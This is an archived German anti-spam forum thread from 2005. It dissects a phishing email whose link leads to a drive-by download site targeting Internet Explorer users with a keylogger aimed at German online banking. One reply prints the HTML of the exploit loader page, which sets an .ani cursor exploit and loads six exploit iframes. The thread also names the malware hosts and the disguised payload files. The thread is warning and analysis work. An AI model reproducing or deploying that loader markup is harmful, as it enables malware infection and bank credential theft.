PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [???]Bei den gestrigen Geschaften kostete 1 EURO 0,8255 USD



webeinspunktnull
13.12.2005, 22:52
Return-Path: <erik [at] mozartmail.com>
Delivery-Date: Tue, 13 Dec 2005 xx:xx:xx +0100
Received: from [71.193.132.202] (helo=c-71-193-132-202.hsd1.or.comcast.net)
by mx.kundenserver.de (node=mxeu9) with ESMTP (Nemesis),
ID: [ID filtered]
Received: from mozartmail.com (mozartmail-com-bk.mr.outblaze.com [202.83.245.165])
by c-71-193-132-202.hsd1.or.comcast.net (Postfix) with ESMTP ID: [ID filtered]
for <>; Tue, 13 Dec 2005 xx:xx:xx -0500
From: Germany, news <erik [at] mozartmail.com>
To: Acquisition <>
Subject: Bei den gestrigen Geschaften kostete 1 EURO 0,8255 USD
Date: Tue, 13 Dec 2005 xx:xx:xx -0500
Message-ID: [ID filtered]
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4024
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2505.0000
X-AntiVirus: checked by AntiVir MailGate (version: 2.0.1.5; AVE: 6.17.0.2; VDF: 6.17.0.5; host: c-71-193-132-202.hsd1.or.comcast.net)
Envelope-To:


Der EURO-Kurs zu US-Dollar ist bis zur minimalen Kursnotierung seit 2000 =
gesunken=2e Bei den gestrigen Geschaften kostete 1 EURO 0,8255 USD=2e Das=
droht mit einer Krise in Europa von grossem Ausmass=2e Am meisten kann d=
ie Wirtschaft von Deutschland und Frankreich betroffen werden=2e Die Str=
assenausschreitungen begannen =2e=2e=2e <a href=3dhttp://www=2ebestworld-=
news=2enet>Weiter lesen Sie =2e=2e=2e</a>

kjz1
14.12.2005, 13:41
Laut DANAM versucht diese Seite einen Keylogger zu installieren, für: deutsche-bank.de, banking.seb.de, banking.postbank.de,
dresdner-privat.de, portal.izb.de, commerzbanking.de, netbank-money.de,
internetbanking.gad.de, homebanking.sskm.de

also Phishing mittels Trojaner.

- kjz

Sirius
14.12.2005, 14:57
Laut DANAM versucht diese Seite einen Keylogger zu installieren...Stimmt - betroffen ist allerdings nur der Internet-Explorer.

Keinesfalls mit dem Internet-Explorer auf diese Seiten gehen!

Die Website ist von der ganz üblen Sorte und wird auf einem Bot-Net gehostet: Service-Scan (http://centralops.net/co/DomainDossier.aspx?addr=bestworld-news.net&dom_dns=true&dom_whois=true&net_whois=true&svc_scan=true&traceroute=true&go1=Submit)

Dort ist ein IFrame eingebaut, der nach intimatephotoalbum.net/syn_combo/ weiterleitet: Whois (http://www.antispam-ev.de/~phil/spamlink/?url=http://intimatephotoalbum.net)

Dieser IFrame mit dem Titel Microsoft Windows Update Service zerfällt in 6 Unterframes, die es in sich haben:
<html>
<head>
<title>Microsoft Windows Update Service</title>
<style>
* {CURSOR: url("./exp_2/1.ani");}
</style>
</head>
<body>
<iframe src="./exp_4/index.htm" width=40 height=40></iframe>
<iframe src="./exp_4/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->
<iframe src="./exp_sp6/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->
<iframe src="./exp_3/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->
<iframe src="./exp_sp60/index.htm" width=40 height=40></iframe> <!-- sp0-2 exp -->
<iframe src="./exp_5/index.htm" width=40 height=40></iframe>
</body>
</html>In verschlüsselter Form werden die beide Dateien <intimatephotoalbum.net/web.exe> und <intimatephotoalbum.net/syn_combo/exp_sp6/2.jpg> heruntergeladen und installiert.
Die EXE-Datei ist ein UPX-gepackter W32/Downloader. Die JPG-Datei kein Foto, sondern eine M$-Hilfedatei (CHM-Format) mit hübschen Exploits...

Keinesfalls mit dem Internet-Explorer auf diese Seiten gehen!

webeinspunktnull
14.12.2005, 20:52
Bitte ins entsprechende Forum verschieben, dankeschön...

[X] Done (Stalker2002)